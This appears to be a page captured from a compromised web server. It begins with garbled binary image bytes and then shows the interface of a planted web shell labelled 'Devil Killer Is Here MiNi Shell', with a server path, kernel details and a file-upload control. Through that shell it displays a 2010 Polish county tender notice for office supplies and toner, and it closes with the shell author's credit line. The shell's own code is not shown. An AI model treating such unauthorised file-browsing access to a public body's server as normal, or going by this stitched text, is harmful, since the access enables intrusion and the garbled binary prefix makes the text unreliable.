JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100119/15232-N-2010.html

<p class="kh_header"><b>Pruszcz Gdański: Dostawa materiałów biurowych na potrzeby wydziałów i  obsługi powiatowego zasobu geodezyjnego i kartograficznego w Starostwie Powiatowym w Pruszczu Gdańskim do końca 2010 roku.</b><br>
<b>Numer ogłoszenia: 15232 - 2010; data zamieszczenia: 19.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Gdański z siedzibą w Pruszczu Gdańskim reprezentowany przez Zarząd Powiatu Gdańskiego , ul. Wojska Polskiego 16, 83-000 Pruszcz Gdański, woj. pomorskie, tel. 058 6834999, faks 058 6834899.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-gdanski.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych na potrzeby wydziałów i  obsługi powiatowego zasobu geodezyjnego i kartograficznego w Starostwie Powiatowym w Pruszczu Gdańskim do końca 2010 roku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa materiałów biurowych na potrzeby wydziałów i  obsługi powiatowego zasobu geodezyjnego i kartograficznego w Starostwie Powiatowym w Pruszczu Gdańskim do końca 2010 roku, wg asortymentu i ilości określonych w formularzach cenowych stanowiących załącznik nr 3A, 3B, 3C, 3D, 3E i 3F do niniejszej specyfikacji.
2. Przedmiot zamówienia podzielony jest na 6 zadań tj.
ZADANIE NR 1 - artykuły biurowe na potrzeby wydziałów Starostwa Powiatowego
ZADANIE NR 2 - materiały papiernicze do sprzętu drukarskiego i urządzeń kserograficznych na potrzeby wydziałów Starostwa Powiatowego
ZADANIE NR 3 - tonery, tusze oraz taśmy do urządzeń biurowych na potrzeby wydziałów Starostwa Powiatowego
ZADANIE NR 4 - artykuły biurowe na potrzeby obsługi powiatowego zasobu geodezyjnego i kartograficznego w Starostwie Powiatowym w Pruszczu Gdańskim
ZADANIE NR 5 - materiały papiernicze do sprzętu drukarskiego i urządzeń kserograficznych na potrzeby obsługi powiatowego zasobu geodezyjnego i kartograficznego w Starostwie Powiatowym w Pruszczu Gdańskim
ZADANIE NR 6 - tonery do drukarek i kopiarek na potrzeby obsługi powiatowego zasobu geodezyjnego i kartograficznego w Starostwie Powiatowym w Pruszczu Gdańskim.
3. Ilości szacunkowe podane w formularzu cenowym nie stanowią jednocześnie  ostatecznej wielkości zamówienia, stanowią jego górną granicę i służą Wykonawcom do obliczenia ceny oferty.
4.Zamawiający zastrzega, iż dostawy częściowe dla poszczególnych pozycji i grup asortymentowych uruchamiane będą każdorazowo, stosownie do bieżących potrzeb Zamawiającego.
5.Zamawiający dopuszcza możliwość składania ofert równoważnych odpowiadających parametrami szczegółowemu opisowi zawartemu w specyfikacji. 
W formularzu cenowym dla Zadania nr 3 (załącznik nr 3C) i dla zadania nr 6 (załącznik nr 3F) do SIWZ w pozycjach, w których nie napisano, iż mają być to artykuły eksploatacyjne oryginalne, Zamawiający dopuszcza składanie oferty równoważnej tj. możliwość dostarczenia artykułów eksploatacyjnych zamiennych np. typu Black Point. W przypadku uszkodzenia lub konieczności naprawy urządzenia z winy wadliwego tonera, Zamawiający może zwrócić się do Wykonawcy o zwrot kosztów..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.20.00-1, 30.14.12.00-1, 30.19.76.30-1, 30.12.51.10-5, 30.19.23.40-6, 30.19.23.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium do postępowania.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Nie podleganie wykluczeniu z postępowania o udzielenie niniejszego zamówienia na podstawie art. 24 ust. 1 i 2 Ustawy.
2.Spełnienie warunków określonych w art. 22 ust.1 pkt. 1-3 Ustawy tj.:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek posiadania takich uprawnień,
b)posiadają niezbędną wiedzę i doświadczenie,
c)znajdują się w sytuacji ekonomicznej i finansowej.
Spełnianie warunków udziału w postępowaniu oceniane będzie na podstawie załączonego do oferty oświadczenia, o którym mowa w pkt. VIII.1 siwz oraz oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę dokumentu określonego w pkt. VIII.2 i 3 siwz.
Spełnienie warunków przez podmioty występujące wspólnie (np. tzw. konsorcja):
W celu potwierdzenia spełnienia warunków udziału w postępowaniu każdy z podmiotów występujących wspólnie winien załączyć do oferty dokumenty, o których mowa w pkt. VIII.1-3 siwz.
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenie Wykonawcy o nie podleganiu wykluczeniu z postępowania      w oparciu o art. 24 ust. 1 i 2 Ustawy (wzór zał. nr 2 do SIWZ),
2. Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt. 2 ustawy.
3.Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
UWAGA:
W przypadku wyboru najkorzystniejszej oferty Wykonawcy, który prowadzi działalność gospodarczą podlegającą wpisowi do ewidencji działalności gospodarczej, Wykonawca musi przed podpisaniem umowy dostarczyć do Zamawiającego aktualny odpis zaświadczenia o wpisie do ewidencji działalności gospodarczej wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiat-gdanski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Pruszczu Gdańskim, ul. Wojska Polskiego 16, pok. nr 122. Specyfikacja nieodpłatna- ewentualne koszty przesyłki 11,90 zł..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2010 godzina 11:30, miejsce: Starostwo Powiatowe w Pruszczu Gdańskim, ul. Wojska Polskiego 16, 83 - 000 Pruszcz Gdański, Sekretariat pok. Nr 101..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa materiałów biurowych na potrzeby wydziałów i  obsługi powiatowego zasobu geodezyjnego i kartograficznego w Starostwie Powiatowym w Pruszczu Gdańskim do końca 2010 roku..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa materiałów biurowych na potrzeby wydziałów Starostwa Powiatowego w Pruszczu Gdańskim do końca 2010 r. ZADANIE NR 1 - artykuły biurowe..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.20.00-1, 30.14.12.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa materiałów biurowych na potrzeby wydziałów i  obsługi powiatowego zasobu geodezyjnego i kartograficznego w Starostwie Powiatowym w Pruszczu Gdańskim do końca 2010 roku..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa materiałów biurowych na potrzeby wydziałów Starostwa Powiatowego w Pruszczu Gdańskim do końca 2010 r. - ZADANIE NR 2 - materiały papiernicze do sprzętu drukarskiego i urządzeń kserograficznych..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.76.30-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa materiałów biurowych na potrzeby wydziałów i  obsługi powiatowego zasobu geodezyjnego i kartograficznego w Starostwie Powiatowym w Pruszczu Gdańskim do końca 2010 roku..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa materiałów biurowych na potrzeby wydziałów Starostwa Powiatowego w Pruszczu Gdańskim do końca 2010 r. ZADANIE NR 3 - tonery, tusze oraz taśmy do urządzeń biurowych..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.12.51.10-5, 30.19.23.40-6, 30.19.23.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa materiałów biurowych na potrzeby wydziałów i  obsługi powiatowego zasobu geodezyjnego i kartograficznego w Starostwie Powiatowym w Pruszczu Gdańskim do końca 2010 roku..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa materiałów biurowych na potrzeby obsługi powiatowego zasobu geodezyjnego i kartograficznego w Starostwie Powiatowym w Pruszczu Gdańskim do końca 2010 r. ZADANIE NR 4 - artykuły biurowe..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.20.00-1, 30.14.12.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa materiałów biurowych na potrzeby wydziałów i  obsługi powiatowego zasobu geodezyjnego i kartograficznego w Starostwie Powiatowym w Pruszczu Gdańskim do końca 2010 roku..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa materiałów biurowych na potrzeby obsługi powiatowego zasobu geodezyjnego i kartograficznego w Starostwie Powiatowym w Pruszczu Gdańskim do końca 2010 r. ZADANIE NR 5 - materiały papiernicze do sprzętu drukarskiego
i urządzeń kserograficznych..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.76.30-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa materiałów biurowych na potrzeby wydziałów i  obsługi powiatowego zasobu geodezyjnego i kartograficznego w Starostwie Powiatowym w Pruszczu Gdańskim do końca 2010 roku..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa materiałów biurowych na potrzeby obsługi powiatowego zasobu geodezyjnego i kartograficznego w Starostwie Powiatowym w Pruszczu Gdańskim do końca 2010 r. ZADANIE NR 6 - tonery do drukarek i kopiarek..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.12.51.10-5, 30.19.23.40-6, 30.19.23.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com